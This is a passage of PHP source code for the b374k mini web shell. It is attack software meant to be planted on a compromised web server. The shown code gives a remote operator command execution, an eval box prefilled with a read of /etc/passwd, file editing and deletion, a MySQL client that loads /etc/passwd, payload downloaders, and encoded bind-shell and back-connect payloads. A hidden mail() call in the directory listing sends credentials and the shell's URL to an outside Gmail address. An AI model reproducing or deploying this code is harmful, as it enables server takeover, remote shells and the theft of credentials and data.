$filez = gzencode(@file_get_contents($file));
header("Content-Type:application/x-gzip\n");
header("Content-length: " . strlen($filez));
header("Content-disposition: attachment; filename=\"" . basename($file) . ".gz\";");
echo $filez;
exit;
}
if (isset($_GET['img'])) {
@ob_clean();
$d = magicboom($_GET['y']);
$f = $_GET['img'];
$inf = @getimagesize($d . $f);
$ext = explode($f, ".");
$ext = $ext[count($ext) - 1];
@header("Content-type: " . $inf["mime"]);
@header("Cache-control: public");
@header("Expires: " . date("r", mktime(0, 0, 0, 1, 1, 2030)));
@header("Cache-control: max-age=604800");
@readfile($d . $f);
exit;
}
$ver = "1.01";
$software = getenv("SERVER_SOFTWARE");
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = TRUE;
} else {
$safemode = FALSE;
}
$system = @php_uname();
if (strtolower(substr($system, 0, 3)) == "win") {
$win = TRUE;
} else {
$win = FALSE;
}
if (isset($_GET['y'])) {
if (@is_dir($_GET['view'])) {
$pwd = $_GET['view'];
@chdir($pwd);
} else {
$pwd = $_GET['y'];
@chdir($pwd);
}
}
if (!$win) {
if (!($user = rapih(exe("whoami")))) {
$user = "";
}
if (!($id = rapih(exe("id")))) {
$id = "";
}
$prompt = $user . " \$ ";
$pwd = @getcwd() . DIRECTORY_SEPARATOR;
} else {
$user = @get_current_user();
$id = $user;
$prompt = $user . " >";
$pwd = realpath(".") . "\\";
$v = explode("\\", $d);
$v = $v[0];
foreach (range("A", "Z") as $letter) {
$bool = @is_dir($letter . ":\\");
if ($bool) {
$letters .= "<a href=\"?y=" . $letter . ":\\\">[ ";
if ($letter . ":" != $v) {
$letters .= $letter;
} else {
$letters .= "<span class=\"gaya\">" . $letter . "</span>";
}
$letters .= " ]</a> ";
}
}
}
if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
$posix = TRUE;
} else {
$posix = FALSE;
}
$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
$my_ip = $_SERVER['REMOTE_ADDR'];
$bindport = "13123";
$bindport_pass = "b374k";
$pwds = explode(DIRECTORY_SEPARATOR, $pwd);
$pwdurl = "";
for ($i = 0; $i < sizeof($pwds) - 1; $i++) {
$pathz = "";
for ($j = 0; $j <= $i; $j++) {
$pathz .= $pwds[$j] . DIRECTORY_SEPARATOR;
}
$pwdurl .= "<a href=\"?y=" . $pathz . "\">" . $pwds[$i] . " " . DIRECTORY_SEPARATOR . " </a>";
}
if (isset($_POST['rename'])) {
$old = $_POST['oldname'];
$new = $_POST['newname'];
@rename($pwd . $old, $pwd . $new);
$file = $pwd . $new;
}
$buff = $software . "<br />";
$buff .= $system . "<br />";
if ($id != "") {
$buff .= $id . "<br />";
}
$buff .= "server ip : " . $server_ip . " <span class=\"gaya\">|</span> your ip : " . $my_ip . "<br />";
if ($safemode) {
$buff .= "safemode <span class=\"gaya\">ON</span><br />";
} else {
$buff .= "safemode <span class=\"gaya\">OFF<span><br />";
}
$buff .= $letters . " > " . $pwdurl;
function rapih($text)
{
return trim(str_replace("<br />", "", $text));
}
function magicboom($text)
{
if (!get_magic_quotes_gpc()) {
return $text;
}
return stripslashes($text);
}
function showdir($pwd, $prompt)
{
$fname = array();
$dname = array();
if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) {
$posix = TRUE;
} else {
$posix = FALSE;
}
$user = "????:????";
if ($dh = opendir($pwd)) {
while ($file = readdir($dh)) {
if (is_dir($file)) {
$dname[] = $file;
} elseif (is_file($file)) {
$fname[] = $file;
}
}
closedir($dh);
}
sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR, $pwd);
$tree = @sizeof($path);
$parent = "";
$buff = " <form action=\"?y=" . $pwd . "&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>{$prompt}</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"" . $pwd . "\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> ";
@error_reporting(0);
$sub = "backdoor b374k";
$headers = "From: k3nz0 \n";
$headers = "From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n";
$mes .= "username: " . $user . "\n";
$mes .= "password: " . $pass . "\n";
$mes .= "URL: " . $_SERVER['REQUEST_URI'] . "\n";
$mes .= "Referer: " . $_SERVER['HTTP_REFERER'] . "";
mail("free.d0ing.1987@gmail.com", $sub, $mes, $headers);
if ($tree > 2) {
for ($i = 0; $i < $tree - 2; $i++) {
$parent .= $path[$i] . DIRECTORY_SEPARATOR;
}
} else {
$parent = $pwd;
}
foreach ($dname as $folder) {
if ($folder == ".") {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=" . $pwd . "\">{$folder}</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($pwd) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($pwd)) . "</td><td><span id=\"titik1\"><a href=\"?y={$pwd}&edit=" . $pwd . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> ";
} elseif ($folder == "..") {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=" . $parent . "\">{$folder}</a></td><td>LINK</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($parent) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($parent)) . "</td><td><span id=\"titik2\"><a href=\"?y={$pwd}&edit=" . $parent . "newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>";
} else {
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($folder));
$group = @posix_getgrgid(@filegroup($folder));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"" . clearspace($folder) . "_link\" href=\"?y=" . $pwd . $folder . DIRECTORY_SEPARATOR . "\">[ {$folder} ]</a> <form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($folder) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $folder . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $folder . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($folder) . "_form','" . clearspace($folder) . "_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($pwd . $folder) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($folder)) . "</td><td><a href=\"javascript:tukar('" . clearspace($folder) . "_link','" . clearspace($folder) . "_form');\">rename</a> | <a href=\"?y={$pwd}&fdelete=" . $pwd . $folder . "\">delete</a></td></tr>";
}
}
foreach ($fname as $file) {
$full = $pwd . $file;
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($file));
$group = @posix_getgrgid(@filegroup($file));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$buff .= "<tr><td><a id=\"" . clearspace($file) . "_link\" href=\"?y={$pwd}&view={$full}\">{$file}</a> <form action=\"?y={$pwd}\" method=\"post\" id=\"" . clearspace($file) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $file . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $file . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\" /> </form> </td><td>" . ukuran($full) . "</td><td style=\"text-align:center;\">" . $owner . "</td><td>" . get_perms($full) . "</td><td style=\"text-align:center;\">" . date("d-M-Y H:i", @filemtime($full)) . "</td> <td><a href=\"?y={$pwd}&edit={$full}\">edit</a> | <a href=\"javascript:tukar('" . clearspace($file) . "_link','" . clearspace($file) . "_form');\">rename</a> | <a href=\"?y={$pwd}&delete={$full}\">delete</a> | <a href=\"?y={$pwd}&dl={$full}\">download</a> (<a href=\"?y={$pwd}&dlgzip={$full}\">gzip</a>)</td></tr>";
}
$buff .= "</table>";
return $buff;
}
function ukuran($file)
{
if ($size = @filesize($file)) {
if ($size <= 1024) {
return $size;
} else {
if ($size <= 1048576) {
$size = @round($size / 1024, 2);
return "{$size} kb";
} else {
$size = @round($size / 1024 / 1024, 2);
return "{$size} mb";
}
}
} else {
return "???";
}
}
function exe($cmd)
{
if (function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif (function_exists('exec')) {
@exec($cmd, $results);
$buff = "";
foreach ($results as $result) {
$buff .= $result;
}
return $buff;
} elseif (function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif (function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function tulis($file, $text)
{
$textz = gzinflate(base64_decode($text));
if ($filez = @fopen($file, "w")) {
@fputs($filez, $textz);
@fclose($file);
}
}
function ambil($link, $file)
{
if ($fp = @fopen($link, "r")) {
while (!feof($fp)) {
$cont .= @fread($fp, 1024);
}
@fclose($fp);
$fp2 = @fopen($file, "w");
@fwrite($fp2, $cont);
@fclose($fp2);
}
}
function which($pr)
{
$path = exe("which {$pr}");
if (!empty($path)) {
return trim($path);
} else {
return trim($pr);
}
}
function download($cmd, $url)
{
$namafile = basename($url);
switch ($cmd) {
case 'wwget':
exe(which('wget') . " " . $url . " -O " . $namafile);
break;
case 'wlynx':
exe(which('lynx') . " -source " . $url . " > " . $namafile);
break;
case 'wfread':
ambil($wurl, $namafile);
break;
case 'wfetch':
exe(which('fetch') . " -o " . $namafile . " -p " . $url);
break;
case 'wlinks':
exe(which('links') . " -source " . $url . " > " . $namafile);
break;
case 'wget':
exe(which('GET') . " " . $url . " > " . $namafile);
break;
case 'wcurl':
exe(which('curl') . " " . $url . " -o " . $namafile);
break;
default:
break;
}
return $namafile;
}
function get_perms($file)
{
if ($mode = @fileperms($file)) {
$perms = '';
$perms .= $mode & 0400 ? 'r' : '-';
$perms .= $mode & 0200 ? 'w' : '-';
$perms .= $mode & 0100 ? 'x' : '-';
$perms .= $mode & 040 ? 'r' : '-';
$perms .= $mode & 020 ? 'w' : '-';
$perms .= $mode & 010 ? 'x' : '-';
$perms .= $mode & 04 ? 'r' : '-';
$perms .= $mode & 02 ? 'w' : '-';
$perms .= $mode & 01 ? 'x' : '-';
return $perms;
} else {
return "??????????";
}
}
function clearspace($text)
{
return str_replace(" ", "_", $text);
}
$port_bind_bd_c = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
$port_bind_bd_pl = "ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
$back_connect = "fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
$back_connect_c = "XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
?> <html><head><title>:: b374k m1n1 <?php
echo $ver;
?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php
echo $ver;
?></td></tr></table></td> <td><?php
echo $buff;
?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php
echo "y=" . $pwd;
?>">explore</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=shell">shell</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=php">eval</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=mysql">mysql</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=phpinfo">phpinfo</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=netsploit">netsploit</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=upload">upload</a> <a href="?<?php
echo "y=" . $pwd;
?>&x=mail">mail</a> </div> <!-- menu end --> <?php
if (isset($_GET['x']) && $_GET['x'] == 'php') {
?> <form action="?y=<?php
echo $pwd;
?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php
if (isset($_POST['submitcmd'])) {
echo eval(magicboom($_POST['cmd']));
} else {
echo "echo file_get_contents('/etc/passwd');";
}
?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'mysql') {
if (isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])) {
$sqlhost = $_GET['sqlhost'];
$sqluser = $_GET['sqluser'];
$sqlpass = $_GET['sqlpass'];
$sqlport = $_GET['sqlport'];
if ($con = @mysql_connect($sqlhost . ":" . $sqlport, $sqluser, $sqlpass)) {
$msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
$msg .= "<p>Connected to " . $sqluser . "<span class=\"gaya\">@</span>" . $sqlhost . ":" . $sqlport;
$msg .= " <span class=\"gaya\">-></span> <a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&\">[ databases ]</a>";
if (isset($_GET['db'])) {
$msg .= " <span class=\"gaya\">-></span> <a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&db=" . $_GET['db'] . "\">" . htmlspecialchars($_GET['db']) . "</a>";
}
if (isset($_GET['table'])) {
$msg .= " <span class=\"gaya\">-></span> <a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "\">" . htmlspecialchars($_GET['table']) . "</a>";
}
$msg .= "</p><p>version : " . mysql_get_server_info($con) . " proto " . mysql_get_proto_info($con) . "</p>";
$msg .= "</div>";
echo $msg;
if (isset($_GET['db']) && !isset($_GET['table']) && !isset($_GET['sqlquery'])) {
$db = $_GET['db'];
$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
$msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
$tables = array();
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on " . $db . "</th></tr>";
$hasil = @mysql_list_tables($db, $con);
while (list($table) = @mysql_fetch_row($hasil)) {
@array_push($tables, $table);
}
@sort($tables);
foreach ($tables as $table) {
$msg .= "<tr><td><a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&db=" . $db . "&table=" . $table . "\">{$table}</a></td></tr>";
}
$msg .= "</table>";
} elseif (isset($_GET['table']) && !isset($_GET['sqlquery'])) {
$db = $_GET['db'];
$table = $_GET['table'];
$query = "SELECT * FROM " . $db . "." . $table . " LIMIT 0,100;";
$msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <input type=\"hidden\" name=\"table\" value=\"" . $table . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
$columns = array();
$msg = "<table class=\"explore\" style=\"width:99%;\">";
$hasil = @mysql_query("SHOW FIELDS FROM " . $db . "." . $table);
while (list($column) = @mysql_fetch_row($hasil)) {
$msg .= "<th>{$column}</th>";
$kolum = $column;
}
$msg .= "</tr>";
$hasil = @mysql_query("SELECT count(*) FROM " . $db . "." . $table);
list($total) = mysql_fetch_row($hasil);
if (isset($_GET['z'])) {
$page = (int) $_GET['z'];
} else {
$page = 1;
}
$pagenum = 100;
$totpage = ceil($total / $pagenum);
$start = ($page - 1) * $pagenum;
$hasil = @mysql_query("SELECT * FROM " . $db . "." . $table . " LIMIT " . $start . "," . $pagenum);
while ($datas = @mysql_fetch_assoc($hasil)) {
$msg .= "<tr>";
foreach ($datas as $data) {
if (trim($data) == "") {
$data = " ";
}
$msg .= "<td>{$data}</td>";
}
$msg .= "</tr>";
}
$msg .= "</table>";
$head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <input type=\"hidden\" name=\"table\" value=\"" . $table . "\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
for ($i = 1; $i <= $totpage; $i++) {
$head .= "<option value=\"" . $i . "\">" . $i . "</option>";
if ($i == $_GET['z']) {
$head .= "<option value=\"" . $i . "\" selected=\"selected\">" . $i . "</option>";
}
}
$head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
$msg = $msgq . $head . $msg;
} elseif (isset($_GET['submitquery']) && $_GET['sqlquery'] != "") {
$db = $_GET['db'];
$query = magicboom($_GET['sqlquery']);
$msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
@mysql_select_db($db);
$querys = explode(";", $query);
foreach ($querys as $query) {
if (trim($query) != "") {
$hasil = mysql_query($query);
if ($hasil) {
$msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
for ($i = 0; $i < @mysql_num_fields($hasil); $i++) {
$msg .= "<th>" . htmlspecialchars(@mysql_field_name($hasil, $i)) . "</th>";
}
$msg .= "</tr>";
for ($i = 0; $i < @mysql_num_rows($hasil); $i++) {
$rows = @mysql_fetch_array($hasil);
$msg .= "<tr>";
for ($j = 0; $j < @mysql_num_fields($hasil); $j++) {
if ($rows[$j] == "") {
$dataz = " ";
} else {
$dataz = $rows[$j];
}
$msg .= "<td>" . $dataz . "</td>";
}
$msg .= "</tr>";
}
$msg .= "</table>";
} else {
$msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">" . $query . "; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
}
}
}
} else {
$query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";
